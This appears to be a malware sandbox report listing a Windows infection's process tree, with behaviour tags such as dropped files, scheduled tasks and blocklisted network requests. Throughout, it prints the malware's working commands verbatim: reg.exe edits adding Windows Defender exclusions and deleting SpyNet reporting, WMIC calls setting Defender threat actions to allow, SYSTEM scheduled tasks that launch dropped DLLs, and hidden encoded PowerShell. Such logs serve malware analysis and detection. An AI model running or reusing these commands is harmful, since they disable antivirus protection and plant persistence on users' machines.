C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR" /t REG_DWORD /d 0 /reg:324⤵PID:8072
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR" /t REG_DWORD /d 0 /reg:325⤵PID:5188
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR" /t REG_DWORD /d 0 /reg:644⤵PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfNWPhScxyylC" /t REG_DWORD /d 0 /reg:324⤵PID:7512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfNWPhScxyylC" /t REG_DWORD /d 0 /reg:644⤵PID:7012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CaOqiYMiQPmU2" /t REG_DWORD /d 0 /reg:324⤵PID:6484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CaOqiYMiQPmU2" /t REG_DWORD /d 0 /reg:644⤵PID:6692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpvPjMDmaiUn" /t REG_DWORD /d 0 /reg:324⤵PID:6284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpvPjMDmaiUn" /t REG_DWORD /d 0 /reg:644⤵PID:6392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YSFbCTIaU" /t REG_DWORD /d 0 /reg:324⤵PID:7904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YSFbCTIaU" /t REG_DWORD /d 0 /reg:644⤵PID:6480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YwFgfawDzaFJYFVB /t REG_DWORD /d 0 /reg:324⤵PID:5372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YwFgfawDzaFJYFVB /t REG_DWORD /d 0 /reg:644⤵PID:8096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU /t REG_DWORD /d 0 /reg:324⤵PID:8040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU /t REG_DWORD /d 0 /reg:644⤵PID:7364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQxOXlbRXdqDUiOe /t REG_DWORD /d 0 /reg:324⤵PID:5144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQxOXlbRXdqDUiOe /t REG_DWORD /d 0 /reg:644⤵PID:8020
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBumTvfjY" /SC once /ST 01:08:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
PID:1036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBumTvfjY"3⤵PID:748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBumTvfjY"3⤵PID:5824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hxUIoduwsSkQKnehv" /SC once /ST 04:00:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gQxOXlbRXdqDUiOe\QWmmphvjSXLGJma\UbmPrUN.exe\" Tf /site_id 216660 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hxUIoduwsSkQKnehv"3⤵
- Blocklisted process makes network request
PID:1456
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:6844
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:4460
-
-
-
C:\Windows\Temp\gQxOXlbRXdqDUiOe\QWmmphvjSXLGJma\UbmPrUN.exeC:\Windows\Temp\gQxOXlbRXdqDUiOe\QWmmphvjSXLGJma\UbmPrUN.exe Tf /site_id 216660 /S2⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:6224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:7696
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:2596
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5520
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7908 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:2696
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6604
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:7960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5856 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5912
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:7008
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5104
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7224 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:7068
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:7792
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5248
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5728 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:7348
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCQQUSYoXLKlZTQVFm"3⤵PID:7048
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:6152
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:8176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:6536
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1848
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YSFbCTIaU\wTtncs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "TXAwOSJqerYTzUX" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TXAwOSJqerYTzUX2" /F /xml "C:\Program Files (x86)\YSFbCTIaU\EcEMsvt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:8068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TXAwOSJqerYTzUX"3⤵PID:5308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TXAwOSJqerYTzUX"3⤵PID:7084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MpGuFfBVdJflLk" /F /xml "C:\Program Files (x86)\CaOqiYMiQPmU2\CYTqTeQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZoXPCQOixILhL2" /F /xml "C:\ProgramData\YwFgfawDzaFJYFVB\JiSGqdT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:7024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TSZDlHjZcujaNcgsj2" /F /xml "C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\yEHMdln.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NrvtNKuORviNiFRYXGZ2" /F /xml "C:\Program Files (x86)\AfNWPhScxyylC\uhXvvFg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JWccChrZepOVqMLId" /SC once /ST 01:33:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gQxOXlbRXdqDUiOe\YpjwLIPw\tpwMjWf.dll\",#1 /site_id 216660" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JWccChrZepOVqMLId"3⤵PID:8148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuyhAIOUfZM" /SC once /ST 06:37:28 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\crIoAsHR\mqQpCvn.exe\" wZ /S"3⤵
- Creates scheduled task(s)
PID:7456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuyhAIOUfZM"3⤵PID:6020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuyhAIOUfZM"3⤵PID:7732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuyhAIOUfZM"3⤵PID:7808
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:6908
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:7420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:7952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1248
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hxUIoduwsSkQKnehv"3⤵PID:6852
-
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\gQxOXlbRXdqDUiOe\YpjwLIPw\tpwMjWf.dll",#1 /site_id 2166602⤵PID:5736
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\gQxOXlbRXdqDUiOe\YpjwLIPw\tpwMjWf.dll",#1 /site_id 2166603⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:4332 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JWccChrZepOVqMLId"4⤵PID:4276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\crIoAsHR\mqQpCvn.exeC:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\crIoAsHR\mqQpCvn.exe wZ /S2⤵
- Modifies Internet Explorer settings
PID:6916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:7440
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:4268
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2236
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6912
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:4792
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6444
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:7504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:7444
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:7864
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6036
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:3344
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6628
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:6996
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6172
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6612
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:7852
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\stgbdvvC:\Users\Admin\AppData\Roaming\stgbdvv2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5500
-
-
C:\Users\Admin\AppData\Roaming\stgbdvvC:\Users\Admin\AppData\Roaming\stgbdvv2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7672
-
-
C:\Users\Admin\AppData\Roaming\stgbdvvC:\Users\Admin\AppData\Roaming\stgbdvv2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6360
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:988
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:7908
-
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT1⤵
- Executes dropped EXE
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\is-4DR8N.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4DR8N.tmp\setup_2.tmp" /SL5="$20208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2648
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:508 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4700
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:968 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4028
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4244
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:6884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:7120
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5540 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A95674F6BE2296E8121271ACE8416019 C2⤵
- Loads dropped DLL
PID:6268
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FA84F76C8408063D5B56068B1E274A3B2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7152 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:5592 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:8136
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 54CF04E92AA7D05DDCB686EF15B1D595 E Global\MSI00002⤵
- Loads dropped DLL
PID:8048
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:7548
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8048 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
